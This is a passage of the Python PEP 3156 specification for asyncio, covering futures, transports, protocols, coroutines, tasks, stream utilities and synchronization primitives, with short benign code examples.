
In debug mode many additional checks are enabled, for example:

+
    +
  • Source tracebacks are available for unhandled exceptions in futures/tasks.
  • +
  • The loop checks for slow callbacks to detect accidental blocking for I/O.

    The loop.slow_callback_duration attribute controls the maximum +execution time allowed between two yield points before a slow +callback is reported. The default value is 0.1 seconds; it may be +changed by assigning to it.

    +
  • +
+

There are two methods related to debug mode:

+
    +
  • get_debug() returns True if debug mode is enabled, +False otherwise.
  • +
  • set_debug(enabled) enables debug mode if the argument is True.
  • +
+

Debug mode is automatically enabled if the PYTHONASYNCIODEBUG +environment variable is defined and not empty.

+
+
+

Handles

+

The various methods for registering one-off callbacks +(call_soon(), call_later(), call_at() and +call_soon_threadsafe()) all return an object representing the +registration that can be used to cancel the callback. This object is +called a Handle. Handles are opaque and have only one public +method:

+
    +
  • cancel(): Cancel the callback.
  • +
+

Note that add_reader(), add_writer() and +add_signal_handler() do not return Handles.

+
+
+

Servers

+

The create_server() method returns a Server instance, which +wraps the sockets (or other network objects) used to accept requests. +This class has two public methods:

+
    +
  • close(): Close the service. This stops accepting new requests +but does not cancel requests that have already been accepted and are +currently being handled.
  • +
  • wait_closed(): A coroutine that blocks until the service is +closed and all accepted requests have been handled.
  • +
+
+
+

Futures

+

The asyncio.Future class here is intentionally similar to the +concurrent.futures.Future class specified by PEP 3148, but there +are slight differences. Whenever this PEP talks about Futures or +futures this should be understood to refer to asyncio.Future unless +concurrent.futures.Future is explicitly mentioned. The supported +public API is as follows, indicating the differences with PEP 3148:

+
    +
  • cancel(). If the Future is already done (or cancelled), do +nothing and return False. Otherwise, this attempts to cancel +the Future and returns True. If the cancellation attempt is +successful, eventually the Future’s state will change to cancelled +(so that cancelled() will return True) +and the callbacks will be scheduled. For regular Futures, +cancellation will always succeed immediately; but for Tasks (see +below) the task may ignore or delay the cancellation attempt.
  • +
  • cancelled(). Returns True if the Future was successfully +cancelled.
  • +
  • done(). Returns True if the Future is done. Note that a +cancelled Future is considered done too (here and everywhere).
  • +
  • result(). Returns the result set with set_result(), or +raises the exception set with set_exception(). Raises +CancelledError if cancelled. Difference with PEP 3148: This has +no timeout argument and does not wait; if the future is not yet +done, it raises an exception.
  • +
  • exception(). Returns the exception if set with +set_exception(), or None if a result was set with +set_result(). Raises CancelledError if cancelled. +Difference with PEP 3148: This has no timeout argument and does +not wait; if the future is not yet done, it raises an exception.
  • +
  • add_done_callback(fn). Add a callback to be run when the Future +becomes done (or is cancelled). If the Future is already done (or +cancelled), schedules the callback to using call_soon(). +Difference with PEP 3148: The callback is never called immediately, +and always in the context of the caller – typically this is a +thread. You can think of this as calling the callback through +call_soon(). Note that in order to match PEP 3148, the callback +(unlike all other callbacks defined in this PEP, and ignoring the +convention from the section “Callback Style” below) is always called +with a single argument, the Future object. (The motivation for +strictly serializing callbacks scheduled with call_soon() +applies here too.)
  • +
  • remove_done_callback(fn). Remove the argument from the list of +callbacks. This method is not defined by PEP 3148. The argument +must be equal (using ==) to the argument passed to +add_done_callback(). Returns the number of times the callback +was removed.
  • +
  • set_result(result). The Future must not be done (nor cancelled) +already. This makes the Future done and schedules the callbacks. +Difference with PEP 3148: This is a public API.
  • +
  • set_exception(exception). The Future must not be done (nor +cancelled) already. This makes the Future done and schedules the +callbacks. Difference with PEP 3148: This is a public API.
  • +
+

The internal method set_running_or_notify_cancel() is not +supported; there is no way to set the running state. Likewise, +the method running() is not supported.

+

The following exceptions are defined:

+
    +
  • InvalidStateError. Raised whenever the Future is not in a state +acceptable to the method being called (e.g. calling set_result() +on a Future that is already done, or calling result() on a Future +that is not yet done).
  • +
  • InvalidTimeoutError. Raised by result() and exception() +when a nonzero timeout argument is given.
  • +
  • CancelledError. An alias for +concurrent.futures.CancelledError. Raised when result() or +exception() is called on a Future that is cancelled.
  • +
  • TimeoutError. An alias for concurrent.futures.TimeoutError. +May be raised by run_until_complete().
  • +
+

A Future is associated with an event loop when it is created.

+

A asyncio.Future object is not acceptable to the wait() and +as_completed() functions in the concurrent.futures package. +However, there are similar APIs asyncio.wait() and +asyncio.as_completed(), described below.

+

A asyncio.Future object is acceptable to a yield from expression +when used in a coroutine. This is implemented through the +__iter__() interface on the Future. See the section “Coroutines +and the Scheduler” below.

+

When a Future is garbage-collected, if it has an associated exception +but neither result() nor exception() has ever been called, the +exception is logged. (When a coroutine uses yield from to wait +for a Future, that Future’s result() method is called once the +coroutine is resumed.)

+

In the future (pun intended) we may unify asyncio.Future and +concurrent.futures.Future, e.g. by adding an __iter__() method +to the latter that works with yield from. To prevent accidentally +blocking the event loop by calling e.g. result() on a Future +that’s not done yet, the blocking operation may detect that an event +loop is active in the current thread and raise an exception instead. +However the current PEP strives to have no dependencies beyond Python +3.3, so changes to concurrent.futures.Future are off the table for +now.

+

There are some public functions related to Futures:

+
    +
  • asyncio.async(arg). This takes an argument that is either a +coroutine object or a Future (i.e., anything you can use with +yield from) and returns a Future. If the argument is a Future, +it is returned unchanged; if it is a coroutine object, it wraps it +in a Task (remember that Task is a subclass of Future).
  • +
  • asyncio.wrap_future(future). This takes a PEP 3148 Future +(i.e., an instance of concurrent.futures.Future) and returns a +Future compatible with the event loop (i.e., a asyncio.Future +instance).
  • +
+
+
+

Transports

+

Transports and protocols are strongly influenced by Twisted and PEP +3153. Users rarely implement or instantiate transports – rather, +event loops offer utility methods to set up transports.

+

Transports work in conjunction with protocols. Protocols are +typically written without knowing or caring about the exact type of +transport used, and transports can be used with a wide variety of +protocols. For example, an HTTP client protocol implementation may be +used with either a plain socket transport or an SSL/TLS transport. +The plain socket transport can be used with many different protocols +besides HTTP (e.g. SMTP, IMAP, POP, FTP, IRC, SPDY).

+

The most common type of transport is a bidirectional stream transport. +There are also unidirectional stream transports (used for pipes) and +datagram transports (used by the create_datagram_endpoint() +method).

+
+

Methods For All Transports

+
    +
  • get_extra_info(name, default=None). This is a catch-all method +that returns implementation-specific information about a transport. +The first argument is the name of the extra field to be retrieved. +The optional second argument is a default value to be returned. +Consult the implementation documentation to find out the supported +extra field names. For an unsupported name, the default is always +returned.
  • +
+
+
+

Bidirectional Stream Transports

+

A bidirectional stream transport is an abstraction on top of a socket +or something similar (for example, a pair of UNIX pipes or an SSL/TLS +connection).

+

Most connections have an asymmetric nature: the client and server +usually have very different roles and behaviors. Hence, the interface +between transport and protocol is also asymmetric. From the +protocol’s point of view, writing data is done by calling the +write() method on the transport object; this buffers the data and +returns immediately. However, the transport takes a more active role +in reading data: whenever some data is read from the socket (or +other data source), the transport calls the protocol’s +data_received() method.

+

Nevertheless, the interface between transport and protocol used by +bidirectional streams is the same for clients as it is for servers, +since the connection between a client and a server is essentially a +pair of streams, one in each direction.

+

Bidirectional stream transports have the following public methods:

+
    +
  • write(data). Write some bytes. The argument must be a bytes +object. Returns None. The transport is free to buffer the +bytes, but it must eventually cause the bytes to be transferred to +the entity at the other end, and it must maintain stream behavior. +That is, t.write(b'abc'); t.write(b'def') is equivalent to +t.write(b'abcdef'), as well as to:
    t.write(b'a')
    +t.write(b'b')
    +t.write(b'c')
    +t.write(b'd')
    +t.write(b'e')
    +t.write(b'f')
    +
    +
    +
  • +
  • writelines(iterable). Equivalent to:
    for data in iterable:
    +    self.write(data)
    +
    +
    +
  • +
  • write_eof(). Close the writing end of the connection. +Subsequent calls to write() are not allowed. Once all buffered +data is transferred, the transport signals to the other end that no +more data will be received. Some protocols don’t support this +operation; in that case, calling write_eof() will raise an +exception. (Note: This used to be called half_close(), but +unless you already know what it is for, that name doesn’t indicate +which end is closed.)
  • +
  • can_write_eof(). Return True if the protocol supports +write_eof(), False if it does not. (This method typically +returns a fixed value that depends only on the specific Transport +class, not on the state of the Transport object. It is needed +because some protocols need to change their behavior when +write_eof() is unavailable. For example, in HTTP, to send data +whose size is not known ahead of time, the end of the data is +typically indicated using write_eof(); however, SSL/TLS does not +support this, and an HTTP protocol implementation would have to use +the “chunked” transfer encoding in this case. But if the data size +is known ahead of time, the best approach in both cases is to use +the Content-Length header.)
  • +
  • get_write_buffer_size(). Return the current size of the +transport’s write buffer in bytes. This only knows about the write +buffer managed explicitly by the transport; buffering in other +layers of the network stack or elsewhere of the network is not +reported.
  • +
  • set_write_buffer_limits(high=None, low=None). Set the high- and +low-water limits for flow control.

    These two values control when to call the protocol’s +pause_writing() and resume_writing() methods. If specified, +the low-water limit must be less than or equal to the high-water +limit. Neither value can be negative.

    +

    The defaults are implementation-specific. If only the high-water +limit is given, the low-water limit defaults to an +implementation-specific value less than or equal to the high-water +limit. Setting high to zero forces low to zero as well, and causes +pause_writing() to be called whenever the buffer becomes +non-empty. Setting low to zero causes resume_writing() to be +called only once the buffer is empty. Use of zero for either limit +is generally sub-optimal as it reduces opportunities for doing I/O +and computation concurrently.

    +
  • +
  • pause_reading(). Suspend delivery of data to the protocol until +a subsequent resume_reading() call. Between pause_reading() +and resume_reading(), the protocol’s data_received() method +will not be called.
  • +
  • resume_reading(). Restart delivery of data to the protocol via +data_received(). Note that “paused” is a binary state – +pause_reading() should only be called when the transport is not +paused, while resume_reading() should only be called when the +transport is paused.
  • +
  • close(). Sever the connection with the entity at the other end. +Any data buffered by write() will (eventually) be transferred +before the connection is actually closed. The protocol’s +data_received() method will not be called again. Once all +buffered data has been flushed, the protocol’s connection_lost() +method will be called with None as the argument. Note that +this method does not wait for all that to happen.
  • +
  • abort(). Immediately sever the connection. Any data still +buffered by the transport is thrown away. Soon, the protocol’s +connection_lost() method will be called with None as +argument.
  • +
+
+
+

Unidirectional Stream Transports

+

A writing stream transport supports the write(), writelines(), +write_eof(), can_write_eof(), close() and abort() methods +described for bidirectional stream transports.

+

A reading stream transport supports the pause_reading(), +resume_reading() and close() methods described for +bidirectional stream transports.

+

A writing stream transport calls only connection_made() and +connection_lost() on its associated protocol.

+

A reading stream transport can call all protocol methods specified in +the Protocols section below (i.e., the previous two plus +data_received() and eof_received()).

+
+
+

Datagram Transports

+

Datagram transports have these methods:

+
    +
  • sendto(data, addr=None). Sends a datagram (a bytes object). +The optional second argument is the destination address. If +omitted, remote_addr must have been specified in the +create_datagram_endpoint() call that created this transport. If +present, and remote_addr was specified, they must match. The +(data, addr) pair may be sent immediately or buffered. The return +value is None.
  • +
  • abort(). Immediately close the transport. Buffered data will +be discarded.
  • +
  • close(). Close the transport. Buffered data will be +transmitted asynchronously.
  • +
+

Datagram transports call the following methods on the associated +protocol object: connection_made(), connection_lost(), +error_received() and datagram_received(). (“Connection” +in these method names is a slight misnomer, but the concepts still +exist: connection_made() means the transport representing the +endpoint has been created, and connection_lost() means the +transport is closed.)

+
+
+

Subprocess Transports

+

Subprocess transports have the following methods:

+
    +
  • get_pid(). Return the process ID of the subprocess.
  • +
  • get_returncode(). Return the process return code, if the +process has exited; otherwise None.
  • +
  • get_pipe_transport(fd). Return the pipe transport (a +unidirectional stream transport) corresponding to the argument, +which should be 0, 1 or 2 representing stdin, stdout or stderr (of +the subprocess). If there is no such pipe transport, return +None. For stdin, this is a writing transport; for stdout and +stderr this is a reading transport. You must use this method to get +a transport you can use to write to the subprocess’s stdin.
  • +
  • send_signal(signal). Send a signal to the subprocess.
  • +
  • terminate(). Terminate the subprocess.
  • +
  • kill(). Kill the subprocess. On Windows this is an alias for +terminate().
  • +
  • close(). This is an alias for terminate().
  • +
+

Note that send_signal(), terminate() and kill() wrap the +corresponding methods in the standard library subprocess module.

+
+
+
+

Protocols

+

Protocols are always used in conjunction with transports. While a few +common protocols are provided (e.g. decent though not necessarily +excellent HTTP client and server implementations), most protocols will +be implemented by user code or third-party libraries.

+

Like for transports, we distinguish between stream protocols, datagram +protocols, and perhaps other custom protocols. The most common type +of protocol is a bidirectional stream protocol. (There are no +unidirectional protocols.)

+
+

Stream Protocols

+

A (bidirectional) stream protocol must implement the following +methods, which will be called by the transport. Think of these as +callbacks that are always called by the event loop in the right +context. (See the “Context” section way above.)

+
    +
  • connection_made(transport). Indicates that the transport is +ready and connected to the entity at the other end. The protocol +should probably save the transport reference as an instance variable +(so it can call its write() and other methods later), and may +write an initial greeting or request at this point.
  • +
  • data_received(data). The transport has read some bytes from the +connection. The argument is always a non-empty bytes object. There +are no guarantees about the minimum or maximum size of the data +passed along this way. p.data_received(b'abcdef') should be +treated exactly equivalent to:
    p.data_received(b'abc')
    +p.data_received(b'def')
    +
    +
    +
  • +
  • eof_received(). This is called when the other end called +write_eof() (or something equivalent). If this returns a false +value (including None), the transport will close itself. If it +returns a true value, closing the transport is up to the protocol. +However, for SSL/TLS connections this is ignored, because the TLS +standard requires that no more data is sent and the connection is +closed as soon as a “closure alert” is received.

    The default implementation returns None.

    +
  • +
  • pause_writing(). Asks that the protocol temporarily stop +writing data to the transport. Heeding the request is optional, but +the transport’s buffer may grow without bounds if you keep writing. +The buffer size at which this is called can be controlled through +the transport’s set_write_buffer_limits() method.
  • +
  • resume_writing(). Tells the protocol that it is safe to start +writing data to the transport again. Note that this may be called +directly by the transport’s write() method (as opposed to being +called indirectly using call_soon()), so that the protocol may +be aware of its paused state immediately after write() returns.
  • +
  • connection_lost(exc). The transport has been closed or aborted, +has detected that the other end has closed the connection cleanly, +or has encountered an unexpected error. In the first three cases +the argument is None; for an unexpected error, the argument is +the exception that caused the transport to give up.
  • +
+

Here is a table indicating the order and multiplicity of the basic +calls:

+
    +
  1. connection_made() – exactly once
  2. +
  3. data_received() – zero or more times
  4. +
  5. eof_received() – at most once
  6. +
  7. connection_lost() – exactly once
  8. +
+

Calls to pause_writing() and resume_writing() occur in pairs +and only between #1 and #4. These pairs will not be nested. The +final resume_writing() call may be omitted; i.e. a paused +connection may be lost and never be resumed.

+
+
+

Datagram Protocols

+

Datagram protocols have connection_made() and +connection_lost() methods with the same signatures as stream +protocols. (As explained in the section about datagram transports, we +prefer the slightly odd nomenclature over defining different method +names to indicating the opening and closing of the socket.)

+

In addition, they have the following methods:

+
    +
  • datagram_received(data, addr). Indicates that a datagram +data (a bytes objects) was received from remote address addr +(an IPv4 2-tuple or an IPv6 4-tuple).
  • +
  • error_received(exc). Indicates that a send or receive operation +raised an OSError exception. Since datagram errors may be +transient, it is up to the protocol to call the transport’s +close() method if it wants to close the endpoint.
  • +
+

Here is a chart indicating the order and multiplicity of calls:

+
    +
  1. connection_made() – exactly once
  2. +
  3. datagram_received(), error_received() – zero or more times
  4. +
  5. connection_lost() – exactly once
  6. +
+
+
+

Subprocess Protocol

+

Subprocess protocols have connection_made(), connection_lost(), +pause_writing() and resume_writing() methods with the same +signatures as stream protocols. In addition, they have the following +methods:

+
    +
  • pipe_data_received(fd, data). Called when the subprocess writes +data to its stdout or stderr. fd is the file descriptor (1 for +stdout, 2 for stderr). data is a bytes object.
  • +
  • pipe_connection_lost(fd, exc). Called when the subprocess +closes its stdin, stdout or stderr. fd is the file descriptor. +exc is an exception or None.
  • +
  • process_exited(). Called when the subprocess has exited. To +retrieve the exit status, use the transport’s get_returncode() +method.
  • +
+

Note that depending on the behavior of the subprocess it is possible +that process_exited() is called either before or after +pipe_connection_lost(). For example, if the subprocess creates a +sub-subprocess that shares its stdin/stdout/stderr and then itself +exits, process_exited() may be called while all the pipes are +still open. On the other hand, when the subprocess closes its +stdin/stdout/stderr but does not exit, pipe_connection_lost() may +be called for all three pipes without process_exited() being +called. If (as is the more common case) the subprocess exits and +thereby implicitly closes all pipes, the calling order is undefined.

+
+
+
+

Callback Style

+

Most interfaces taking a callback also take positional arguments. For +instance, to arrange for foo("abc", 42) to be called soon, you +call loop.call_soon(foo, "abc", 42). To schedule the call +foo(), use loop.call_soon(foo). This convention greatly +reduces the number of small lambdas required in typical callback +programming.

+

This convention specifically does not support keyword arguments. +Keyword arguments are used to pass optional extra information about +the callback. This allows graceful evolution of the API without +having to worry about whether a keyword might be significant to a +callee somewhere. If you have a callback that must be called with a +keyword argument, you can use a lambda. For example:

+
loop.call_soon(lambda: foo('abc', repeat=42))
+
+
+
+
+
+

Coroutines and the Scheduler

+

This is a separate toplevel section because its status is different +from the event loop interface. Usage of coroutines is optional, and +it is perfectly fine to write code using callbacks only. On the other +hand, there is only one implementation of the scheduler/coroutine API, +and if you’re using coroutines, that’s the one you’re using.

+
+

Coroutines

+

A coroutine is a generator that follows certain conventions. For +documentation purposes, all coroutines should be decorated with +@asyncio.coroutine, but this cannot be strictly enforced.

+

Coroutines use the yield from syntax introduced in PEP 380, +instead of the original yield syntax.

+

The word “coroutine”, like the word “generator”, is used for two +different (though related) concepts:

+
    +
  • The function that defines a coroutine (a function definition +decorated with asyncio.coroutine). If disambiguation is needed +we will call this a coroutine function.
  • +
  • The object obtained by calling a coroutine function. This object +represents a computation or an I/O operation (usually a combination) +that will complete eventually. If disambiguation is needed we will +call it a coroutine object.
  • +
+

Things a coroutine can do:

+
    +
  • result = yield from future – suspends the coroutine until the +future is done, then returns the future’s result, or raises an +exception, which will be propagated. (If the future is cancelled, +it will raise a CancelledError exception.) Note that tasks are +futures, and everything said about futures also applies to tasks.
  • +
  • result = yield from coroutine – wait for another coroutine to +produce a result (or raise an exception, which will be propagated). +The coroutine expression must be a call to another coroutine.
  • +
  • return expression – produce a result to the coroutine that is +waiting for this one using yield from.
  • +
  • raise exception – raise an exception in the coroutine that is +waiting for this one using yield from.
  • +
+

Calling a coroutine does not start its code running – it is just a +generator, and the coroutine object returned by the call is really a +generator object, which doesn’t do anything until you iterate over it. +In the case of a coroutine object, there are two basic ways to start +it running: call yield from coroutine from another coroutine +(assuming the other coroutine is already running!), or convert it to a +Task (see below).

+

Coroutines (and tasks) can only run when the event loop is running.

+
+
+

Waiting for Multiple Coroutines

+

To wait for multiple coroutines or Futures, two APIs similar to the +wait() and as_completed() APIs in the concurrent.futures +package are provided:

+
    +
  • asyncio.wait(fs, timeout=None, return_when=ALL_COMPLETED). This +is a coroutine that waits for the Futures or coroutines given by +fs to complete. Coroutine arguments will be wrapped in Tasks +(see below). This returns a Future whose result on success is a +tuple of two sets of Futures, (done, pending), where done is +the set of original Futures (or wrapped coroutines) that are done +(or cancelled), and pending is the rest, i.e. those that are +still not done (nor cancelled). Note that with the defaults for +timeout and return_when, done will always be an empty +list. Optional arguments timeout and return_when have the +same meaning and defaults as for concurrent.futures.wait(): +timeout, if not None, specifies a timeout for the overall +operation; return_when, specifies when to stop. The constants +FIRST_COMPLETED, FIRST_EXCEPTION, ALL_COMPLETED are +defined with the same values and the same meanings as in PEP 3148:
      +
    • ALL_COMPLETED (default): Wait until all Futures are done (or +until the timeout occurs).
    • +
    • FIRST_COMPLETED: Wait until at least one Future is done (or +until the timeout occurs).
    • +
    • FIRST_EXCEPTION: Wait until at least one Future is done but +not cancelled with an exception set. (The exclusion of cancelled +Futures from the condition is surprising, but PEP 3148 does it +this way.)
    • +
    +
  • +
  • asyncio.as_completed(fs, timeout=None). Returns an iterator whose +values are Futures or coroutines; waiting for successive values +waits until the next Future or coroutine from the set fs +completes, and returns its result (or raises its exception). The +optional argument timeout has the same meaning and default as it +does for concurrent.futures.wait(): when the timeout occurs, the +next Future returned by the iterator will raise TimeoutError +when waited for. Example of use:
    for f in as_completed(fs):
    +    result = yield from f  # May raise an exception.
    +    # Use result.
    +
    +
    +

    Note: if you do not wait for the values produced by the iterator, +your for loop may not make progress (since you are not allowing +other tasks to run).

    +
  • +
  • asyncio.wait_for(f, timeout). This is a convenience to wait for +a single coroutine or Future with a timeout. When a timeout occurs, +it cancels the task and raises TimeoutError. To avoid the task +cancellation, wrap it in shield().
  • +
  • asyncio.gather(f1, f2, ...). Returns a Future which waits until +all arguments (Futures or coroutines) are done and return a list of +their corresponding results. If one or more of the arguments is +cancelled or raises an exception, the returned Future is cancelled +or has its exception set (matching what happened to the first +argument), and the remaining arguments are left running in the +background. Cancelling the returned Future does not affect the +arguments. Note that coroutine arguments are converted to Futures +using asyncio.async().
  • +
  • asyncio.shield(f). Wait for a Future, shielding it from +cancellation. This returns a Future whose result or exception +is exactly the same as the argument; however, if the returned +Future is cancelled, the argument Future is unaffected.

    A use case for this function would be a coroutine that caches a +query result for a coroutine that handles a request in an HTTP +server. When the request is cancelled by the client, we could +(arguably) want the query-caching coroutine to continue to run, so +that when the client reconnects, the query result is (hopefully) +cached. This could be written e.g. as follows:

    +
    @asyncio.coroutine
    +def handle_request(self, request):
    +    ...
    +    cached_query = self.get_cache(...)
    +    if cached_query is None:
    +        cached_query = yield from asyncio.shield(self.fill_cache(...))
    +    ...
    +
    +
    +
  • +
+
+
+

Sleeping

+

The coroutine asyncio.sleep(delay) returns after a given time delay.

+
+
+

Tasks

+

A Task is an object that manages an independently running coroutine. +The Task interface is the same as the Future interface, and in fact +Task is a subclass of Future. The task becomes done when its +coroutine returns or raises an exception; if it returns a result, that +becomes the task’s result, if it raises an exception, that becomes the +task’s exception.

+

Cancelling a task that’s not done yet throws an +asyncio.CancelledError exception into the coroutine. If the +coroutine doesn’t catch this (or if it re-raises it) the task will be +marked as cancelled (i.e., cancelled() will return True); but +if the coroutine somehow catches and ignores the exception it may +continue to execute (and cancelled() will return False).

+

Tasks are also useful for interoperating between coroutines and +callback-based frameworks like Twisted. After converting a coroutine +into a Task, callbacks can be added to the Task.

+

To convert a coroutine into a task, call the coroutine function and +pass the resulting coroutine object to the loop.create_task() +method. You may also use asyncio.ensure_future() for this purpose.

+

You may ask, why not automatically convert all coroutines to Tasks? +The @asyncio.coroutine decorator could do this. However, this would +slow things down considerably in the case where one coroutine calls +another (and so on), as switching to a “bare” coroutine has much less +overhead than switching to a Task.

+

The Task class is derived from Future adding new methods:

+
    +
  • current_task(loop=None). A class method returning the +currently running task in an event loop. If loop is None the +method returns the current task for the default loop. Every +coroutine is executed inside a task context, either a Task +created using ensure_future() or loop.create_task(), or by +being called from another coroutine using yield from or +await. This method returns None when called outside a +coroutine, e.g. in a callback scheduled using loop.call_later().
  • +
  • all_tasks(loop=None). A class method returning a set of all +active tasks for the loop. This uses the default loop if loop is +None.
  • +
+
+
+

The Scheduler

+

The scheduler has no public interface. You interact with it by using +yield from future and yield from task. In fact, there is no +single object representing the scheduler – its behavior is +implemented by the Task and Future classes using only the +public interface of the event loop, so it will work with third-party +event loop implementations, too.

+
+
+

Convenience Utilities

+

A few functions and classes are provided to simplify the writing of +basic stream-based clients and servers, such as FTP or HTTP. These +are:

+
    +
  • asyncio.open_connection(host, port): A wrapper for +EventLoop.create_connection() that does not require you to +provide a Protocol factory or class. This is a coroutine that +returns a (reader, writer) pair, where reader is an instance +of StreamReader and writer is an instance of +StreamWriter (both described below).
  • +
  • asyncio.start_server(client_connected_cb, host, port): A wrapper +for EventLoop.create_server() that takes a simple callback +function rather than a Protocol factory or class. This is a +coroutine that returns a Server object just as +create_server() does. Each time a client connection is +accepted, client_connected_cb(reader, writer) is called, where +reader is an instance of StreamReader and writer is an +instance of StreamWriter (both described below). If the result +returned by client_connected_cb() is a coroutine, it is +automatically wrapped in a Task.
  • +
  • StreamReader: A class offering an interface not unlike that of a +read-only binary stream, except that the various reading methods are +coroutines. It is normally driven by a StreamReaderProtocol +instance. Note that there should be only one reader. The interface +for the reader is:
      +
    • readline(): A coroutine that reads a string of bytes +representing a line of text ending in '\n', or until the end +of the stream, whichever comes first.
    • +
    • read(n): A coroutine that reads up to n bytes. If n +is omitted or negative, it reads until the end of the stream.
    • +
    • readexactly(n): A coroutine that reads exactly n bytes, or +until the end of the stream, whichever comes first.
    • +
    • exception(): Return the exception that has been set on the +stream using set_exception(), or None if no exception is set.
    • +
    +

    The interface for the driver is:

    +
      +
    • feed_data(data): Append data (a bytes object) to the +internal buffer. This unblocks a blocked reading coroutine if it +provides sufficient data to fulfill the reader’s contract.
    • +
    • feed_eof(): Signal the end of the buffer. This unblocks a +blocked reading coroutine. No more data should be fed to the +reader after this call.
    • +
    • set_exception(exc): Set an exception on the stream. All +subsequent reading methods will raise this exception. No more +data should be fed to the reader after this call.
    • +
    +
  • +
  • StreamWriter: A class offering an interface not unlike that of a +write-only binary stream. It wraps a transport. The interface is +an extended subset of the transport interface: the following methods +behave the same as the corresponding transport methods: write(), +writelines(), write_eof(), can_write_eof(), +get_extra_info(), close(). Note that the writing methods +are _not_ coroutines (this is the same as for transports, but +different from the StreamReader class). The following method is +in addition to the transport interface:
      +
    • drain(): This should be called with yield from after +writing significant data, for the purpose of flow control. The +intended use is like this:
      writer.write(data)
      +yield from writer.drain()
      +
      +
      +

      Note that this is not technically a coroutine: it returns either a +Future or an empty tuple (both can be passed to yield from). +Use of this method is optional. However, when it is not used, the +internal buffer of the transport underlying the StreamWriter +may fill up with all data that was ever written to the writer. If +an app does not have a strict limit on how much data it writes, it +_should_ call yield from drain() occasionally to avoid filling +up the transport buffer.

      +
    • +
    +
  • +
  • StreamReaderProtocol: A protocol implementation used as an +adapter between the bidirectional stream transport/protocol +interface and the StreamReader and StreamWriter classes. It +acts as a driver for a specific StreamReader instance, calling +its methods feed_data(), feed_eof(), and set_exception() +in response to various protocol callbacks. It also controls the +behavior of the drain() method of the StreamWriter instance.
  • +
+
+
+
+

Synchronization

+

Locks, events, conditions and semaphores modeled after those in the +threading module are implemented and can be accessed by importing +the asyncio.locks submodule. Queues modeled after those in the +queue module are implemented and can be accessed by importing the +asyncio.queues submodule.

+

In general these have a close correspondence to their threaded +counterparts, however, blocking methods (e.g. acquire() on locks, +put() and get() on queues) are coroutines, and timeout +parameters are not provided (you can use asyncio.wait_for() to add +a timeout to a blocking call, however).

+

The docstrings in the modules provide more complete documentation.

+
+

Locks

+

The following classes are provided by asyncio.locks. For all +these except Event, the with statement may be used in +combination with yield from to acquire the lock and ensure that +the lock is released regardless of how the with block is left, as +follows:

+
with (yield from my_lock):
+    ...
+
+
+
    +
  • Lock: a basic mutex, with methods acquire() (a coroutine), +locked(), and release().
  • +
  • Event: an event variable, with methods wait() (a coroutine), +set(), clear(), and is_set().
  • +
  • Condition: a condition variable, with methods acquire(), +wait(), wait_for(predicate) (all three coroutines), +locked(), release(), notify(), and notify_all().
  • +
  • Semaphore: a semaphore, with methods acquire() (a +coroutine), locked(), and release(). The constructor +argument is the initial value (default 1).
  • +
  • BoundedSemaphore: a bounded semaphore; this is similar to +Semaphore but the initial value is also the maximum value.
  • +
+
+
+

Queues

+

The following classes and exceptions are provided by asyncio.queues.

+
    +
  • Queue: a standard queue, with methods get(), put() (both +coroutines), get_nowait(), put_nowait(), empty(), +full(), qsize(), and maxsize().
  • +
  • PriorityQueue: a subclass of Queue that retrieves entries +in priority order (lowest first).
  • +
  • LifoQueue: a subclass of Queue that retrieves the most +recently added entries first.
  • +
  • JoinableQueue: a subclass of Queue with task_done() and +join() methods (the latter a coroutine).
  • +
  • Empty, Full: exceptions raised when get_nowait() or +put_nowait() is called on a queue that is empty or full, +respectively.
  • +
+
+
+
+

Miscellaneous

+
+

Logging

+

All logging performed by the asyncio package uses a single +logging.Logger object, asyncio.logger. To customize logging +you can use the standard Logger API on this object. (Do not +replace the object though.)

+
+
+

SIGCHLD handling on UNIX

+

Efficient implementation of the process_exited() method on +subprocess protocols requires a SIGCHLD signal handler. However, +signal handlers can only be set on the event loop associated with the +main thread. In order to support spawning subprocesses from event +loops running in other threads, a mechanism exists to allow sharing a +SIGCHLD handler between multiple event loops. There are two +additional functions, asyncio.get_child_watcher() and +asyncio.set_child_watcher(), and corresponding methods on the +event loop policy.

+

There are two child watcher implementation classes, +FastChildWatcher and SafeChildWatcher. Both use SIGCHLD. +The SafeChildWatcher class is used by default; it is inefficient +when many subprocesses exist simultaneously. The FastChildWatcher +class is efficient, but it may interfere with other code (either C +code or Python code) that spawns subprocesses without using an +asyncio event loop. If you are sure you are not using other code +that spawns subprocesses, to use the fast implementation, run the +following in your main thread:

+
watcher = asyncio.FastChildWatcher()
+asyncio.set_child_watcher(watcher)
+
+
+
+
+
+

Wish List

+

(There is agreement that these features are desirable, but no +implementation was available when Python 3.4 beta 1 was released, and +the feature freeze for the rest of the Python 3.4 release cycle +prohibits adding them in this late stage. However, they will +hopefully be added in Python 3.5, and perhaps earlier in the PyPI +distribution.)

+
    +
  • Support a “start TLS” operation to upgrade a TCP socket to SSL/TLS.
  • +
+

Former wish list items that have since been implemented (but aren’t +specified by the PEP):

+
    +
  • UNIX domain sockets.
  • +
  • A per-loop error handling callback.
  • +
+
+
+

Open Issues

+

(Note that these have been resolved de facto in favor of the status +quo by the acceptance of the PEP. However, the PEP’s provisional +status allows revising these decisions for Python 3.5.)

+
    +
  • Why do create_connection() and create_datagram_endpoint() +have a proto argument but not create_server()? And why are +the family, flag, proto arguments for getaddrinfo() sometimes +zero and sometimes named constants (whose value is also zero)?
  • +
  • Do we need another inquiry method to tell whether the loop is in the +process of stopping?
  • +
  • A fuller public API for Handle? What’s the use case?
  • +
  • A debugging API? E.g. something that logs a lot of stuff, or logs +unusual conditions (like queues filling up faster than they drain) +or even callbacks taking too much time…
  • +
  • Do we need introspection APIs? E.g. asking for the read callback +given a file descriptor. Or when the next scheduled call is. Or +the list of file descriptors registered with callbacks. Right now +these all require using internals.
  • +
  • Do we need more socket I/O methods, e.g. sock_sendto() and +sock_recvfrom(), and perhaps others like pipe_read()? +I guess users can write their own (it’s not rocket science).
  • +
  • We may need APIs to control various timeouts. E.g. we may want to +limit the time spent in DNS resolution, connecting, ssl/tls handshake, +idle connection, close/shutdown, even per session. Possibly it’s +sufficient to add timeout keyword arguments to some methods, +and other timeouts can probably be implemented by clever use of +call_later() and Task.cancel(). But it’s possible that some +operations need default timeouts, and we may want to change the +default for a specific operation globally (i.e., per event loop).
  • +
+
+
+

References

+ +
+
+

Acknowledgments

+

Apart from PEP 3153, influences include PEP 380 and Greg Ewing’s +tutorial for yield from, Twisted, Tornado, ZeroMQ, pyftpdlib, and +wattle (Steve Dower’s counter-proposal). My previous work on +asynchronous support in the NDB library for Google App Engine provided +an important starting point.

+

